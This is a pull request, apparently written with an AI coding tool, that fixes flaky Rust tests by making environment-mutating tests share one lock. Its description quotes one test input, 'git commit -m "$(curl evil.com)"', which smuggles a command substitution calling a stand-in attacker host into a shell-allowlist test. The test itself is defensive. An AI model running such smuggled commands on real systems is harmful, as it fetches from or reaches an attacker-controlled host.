### PR TITLE
test: serialize env-mutating tests on one lock, not two

### DIFF
--- a/rust/src/cli/dispatch/mod.rs
+++ b/rust/src/cli/dispatch/mod.rs
@@ -1065,7 +1065,6 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_clamps_low() {
-        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(1), 1);
     }
@@ -1073,7 +1072,6 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_clamps_high() {
-        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(32), 4);
     }
@@ -1081,7 +1079,6 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_passthrough() {
-        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(3), 3);
     }
@@ -1089,7 +1086,6 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_env_override() {
-        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_WORKER_THREADS", "12");
         assert_eq!(resolve_worker_threads(2), 12);
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
@@ -1098,7 +1094,6 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_env_invalid_falls_back() {
-        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_WORKER_THREADS", "not_a_number");
         assert_eq!(resolve_worker_threads(3), 3);
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");

--- a/rust/src/cli/dispatch/mod.rs
+++ b/rust/src/cli/dispatch/mod.rs
@@ -1065,6 +1065,7 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_clamps_low() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(1), 1);
     }
@@ -1072,6 +1073,7 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_clamps_high() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(32), 4);
     }
@@ -1079,6 +1081,7 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_default_passthrough() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
         assert_eq!(resolve_worker_threads(3), 3);
     }
@@ -1086,6 +1089,7 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_env_override() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_WORKER_THREADS", "12");
         assert_eq!(resolve_worker_threads(2), 12);
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");
@@ -1094,6 +1098,7 @@ mod tests {
     #[test]
     #[serial]
     fn worker_threads_env_invalid_falls_back() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_WORKER_THREADS", "not_a_number");
         assert_eq!(resolve_worker_threads(3), 3);
         crate::test_env::remove_var("LEAN_CTX_WORKER_THREADS");

--- a/rust/src/core/firewall.rs
+++ b/rust/src/core/firewall.rs
@@ -159,6 +159,7 @@ mod tests {
 
     #[test]
     fn inline_shell_stays_inline_under_byte_cap() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let mut cfg = Config::default();
         cfg.archive.inline_max_bytes = 1024;
         crate::test_env::remove_var("LEAN_CTX_INLINE_MAX_BYTES");
@@ -169,6 +170,8 @@ mod tests {
 
     #[test]
     fn inline_shell_over_byte_cap_uses_archive_path() {
+        // Clearing the env cap only holds if no other test sets it meanwhile.
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let mut cfg = Config::default();
         cfg.archive.inline_max_bytes = 1024;
         crate::test_env::remove_var("LEAN_CTX_INLINE_MAX_BYTES");
@@ -178,6 +181,9 @@ mod tests {
 
     #[test]
     fn inline_shell_requires_explicit_request_and_honors_env_cap() {
+        // Sets the env cap to 2048. Unlocked, that leaks into the sibling tests
+        // above, which assert the behaviour with *no* cap set.
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let mut cfg = Config::default();
         cfg.archive.inline_max_bytes = 1024;
         crate::test_env::set_var("LEAN_CTX_INLINE_MAX_BYTES", "2048");

--- a/rust/src/core/graph_index/tests.rs
+++ b/rust/src/core/graph_index/tests.rs
@@ -483,6 +483,7 @@ fn safe_scan_root_rejects_cloud_sync_roots() {
 #[cfg(target_os = "macos")]
 #[serial_test::serial]
 fn safe_scan_root_refused_for_standalone_under_documents() {
+    let _env_lock = crate::core::data_dir::test_env_lock();
     // #356: a launchd-standalone process (daemon/proxy, ppid 1) must refuse to
     // scan *any* path under ~/Documents — including a real nested project —
     // before normalize/marker-probe/read_dir touches the filesystem. Editor- and

--- a/rust/src/core/graph_index/tests.rs
+++ b/rust/src/core/graph_index/tests.rs
@@ -483,6 +483,9 @@ fn safe_scan_root_rejects_cloud_sync_roots() {
 #[cfg(target_os = "macos")]
 #[serial_test::serial]
 fn safe_scan_root_refused_for_standalone_under_documents() {
+    // Both guards are needed: `#[serial]` and `test_env_lock` are separate
+    // mutexes, and `LEAN_CTX_TCC_STANDALONE` is read by every path
+    // normalization, including in tests that take only the lock.
     let _env_lock = crate::core::data_dir::test_env_lock();
     // #356: a launchd-standalone process (daemon/proxy, ppid 1) must refuse to
     // scan *any* path under ~/Documents — including a real nested project —

--- a/rust/src/core/pathjail.rs
+++ b/rust/src/core/pathjail.rs
@@ -683,6 +683,8 @@ mod tests {
     #[cfg(not(feature = "no-jail"))]
     #[test]
     fn read_only_roots_deny_writes_but_allow_reads() {
+        // `isolated_data_dir` already holds `test_env_lock` for its lifetime —
+        // taking it again here would self-deadlock on a non-reentrant Mutex.
         let _iso = crate::core::data_dir::isolated_data_dir();
 
         let tmp = tempfile::tempdir().unwrap();

--- a/rust/src/core/pathutil.rs
+++ b/rust/src/core/pathutil.rs
@@ -522,6 +522,11 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn tcc_standalone_blocks_probes_under_protected_dirs() {
+        // `#[serial]` and `test_env_lock` are two different mutexes; the tests
+        // in this module need both. `LEAN_CTX_TCC_STANDALONE` is read by
+        // `is_tcc_standalone` (line ~376) on every path normalization, so
+        // setting it here reaches any test that resolves a path — most of which
+        // serialize on `test_env_lock`, not on `#[serial]`.
         let _env_lock = crate::core::data_dir::test_env_lock();
         let Some(home) = dirs::home_dir() else {
             return;

--- a/rust/src/core/pathutil.rs
+++ b/rust/src/core/pathutil.rs
@@ -522,6 +522,7 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn tcc_standalone_blocks_probes_under_protected_dirs() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let Some(home) = dirs::home_dir() else {
             return;
         };
@@ -545,6 +546,7 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn tcc_standalone_detected_via_seatbelt_sentinel() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let Some(home) = dirs::home_dir() else {
             return;
         };
@@ -569,6 +571,7 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn tcc_standalone_skips_canonicalize_under_protected_dirs() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         let Some(home) = dirs::home_dir() else {
             return;
         };
@@ -604,6 +607,7 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn canonicalize_secure_bypasses_tcc_guard_for_pathjail() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         // SECURITY counterpart to the test above (#356): PathJail must keep
         // resolving symlinks even when standalone under ~/Documents, so the jail
         // can detect escapes. `canonicalize_secure` therefore must NOT honour the

--- a/rust/src/core/session/mod.rs
+++ b/rust/src/core/session/mod.rs
@@ -35,6 +35,9 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn normalize_session_skips_marker_probe_for_real_roots() {
+        // Both guards are needed: `#[serial]` and `test_env_lock` are separate
+        // mutexes, and the `LEAN_CTX_TCC_STANDALONE` this test relies on is read
+        // by every path normalization, including in tests that take only the lock.
         let _env_lock = crate::core::data_dir::test_env_lock();
         // A session whose project_root is a plausible real project must not be
         // marker-probed at load time when the process is TCC-standalone: the

--- a/rust/src/core/session/mod.rs
+++ b/rust/src/core/session/mod.rs
@@ -35,6 +35,7 @@ mod tests {
     #[cfg(target_os = "macos")]
     #[serial_test::serial]
     fn normalize_session_skips_marker_probe_for_real_roots() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         // A session whose project_root is a plausible real project must not be
         // marker-probed at load time when the process is TCC-standalone: the
         // probe itself would trip the privacy prompt (#356). The repair

--- a/rust/src/tools/ctx_execute.rs
+++ b/rust/src/tools/ctx_execute.rs
@@ -301,6 +301,7 @@ mod tests {
     #[test]
     #[serial_test::serial]
     fn shell_execution_cannot_bypass_ctx_shell_allowlist() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "echo");
         let (result, outcome) = handle("shell", "definitely_not_allowed_command", None, None);
         crate::test_env::remove_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE");
@@ -314,6 +315,7 @@ mod tests {
     #[test]
     #[serial_test::serial]
     fn shell_batch_is_preflighted_before_any_item_runs() {
+        let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "echo");
         let items = vec![
             ("shell".to_string(), "echo safe".to_string()),

--- a/rust/src/tools/ctx_execute.rs
+++ b/rust/src/tools/ctx_execute.rs
@@ -301,6 +301,10 @@ mod tests {
     #[test]
     #[serial_test::serial]
     fn shell_execution_cannot_bypass_ctx_shell_allowlist() {
+        // Both guards are needed: `#[serial]` and `test_env_lock` are separate
+        // mutexes. The override below replaces the allowlist wholesale, which
+        // broke `gh391_strict_mode_blocks_substitution_in_args` — a test that
+        // serializes on the lock, not on `#[serial]`.
         let _env_lock = crate::core::data_dir::test_env_lock();
         crate::test_env::set_var("LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE", "echo");
         let (result, outcome) = handle("shell", "definitely_not_allowed_command", None, None);


### PR DESCRIPTION
The suite has **two independent mutexes guarding the same process-global env**: `core::data_dir::test_env_lock()` and `#[serial_test::serial]`. A test holding one does not exclude a test holding the other, so they do not serialize against each other at all.

Counting env-mutating `#[test]` fns:

| guard | count | |
|---|---|---|
| `test_env_lock()` only | 260 | |
| `#[serial]` only | **14** | races the 260 |
| both | 4 | |
| neither | 115 | see "left alone" below |

The 14 `#[serial]`-only tests clearly *intended* to serialize — they just picked the mutex the other 260 don't use. This PR gives them `test_env_lock()` too. `#[serial]` stays, since some also want serialization for non-env reasons.

## Two failures traced to concrete pairs

**`shell_allowlist::tests::gh391_strict_mode_blocks_substitution_in_args`** asserts `curl` and `git` are allowlisted:

```rust
let cmd_safe = "git commit -m \"$(curl evil.com)\"";
assert!(check_substitution_in_args(cmd_safe, true).is_ok(),
        "allowlisted inner cmd passes even in strict (#1024)");
```

`effective_allowlist()` lets `LEAN_CTX_SHELL_ALLOWLIST_OVERRIDE` replace the allowlist *wholesale*, and `ctx_execute`'s two `#[serial]`-only tests set it to `"echo"`. Nothing kept them apart.

**`firewall::inline_shell_over_byte_cap_uses_archive_path`** asserts a 1025-byte payload is not inlined when no env cap is set. Its own file-sibling `inline_shell_requires_explicit_request_and_honors_env_cap` sets `LEAN_CTX_INLINE_MAX_BYTES=2048`, under which 1025 *does* inline. Neither took a lock; all three siblings now do.

## One test deliberately does not get the lock

`pathjail::read_only_roots_deny_writes_but_allow_reads` already calls `isolated_data_dir()`, which holds `test_env_lock` for the guard's lifetime (`data_dir.rs:213`). Adding it again self-deadlocks on a non-reentrant `Mutex`.

I hit exactly that while preparing this change — a run that normally takes 46s hung indefinitely. The test's own doc comment says so, and my first pass ignored it. The rule is: *already holds the lock, directly **or** via `isolated_data_dir()`*.

## Verification

Full `cargo test --lib`, 8 runs after the change. None of the four observed flakes recurred:

- `shell_allowlist::tests::gh391_strict_mode_blocks_substitution_in_args`
- `firewall::inline_shell_over_byte_cap_uses_archive_path`
- `code_health::fabric::hotspot_cc_reads_back_persisted_edge`
- `ocla::builtin::savings_ledger::delegates_to_verified_ledger`

Runtime unchanged at ~46s — the added serialization is not measurable.

## Not fixed here

**`ctx_explore::tests::handle_output_is_byte_stable_across_runs` still flakes**, and this PR does not claim to fix it — it is a different root cause. It already takes `test_env_lock`; the failure is lazy index warm-up, not env:

```
assertion `left == right` failed: explore output must be byte-stable
  left:  ... citations: 2 ... cache.rs:2-4  CacheStore (impl)
  right: ... citations: 3 ... cache.rs:2-4  CacheStore (impl)
                                cache.rs:3-3  lookup (fn)
```

The first `handle()` call sees a partially-warm index, the second sees `lookup (fn)` too. Follow-up PR.

The 115 "neither" tests are also left alone: most never collide in practice, and blanket-locking them would serialize a large share of the suite for no measured benefit.

## Note

CI on this branch will stay red until #1186 lands — `main` currently fails to compile its tests under `-D warnings`, independently of this change.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
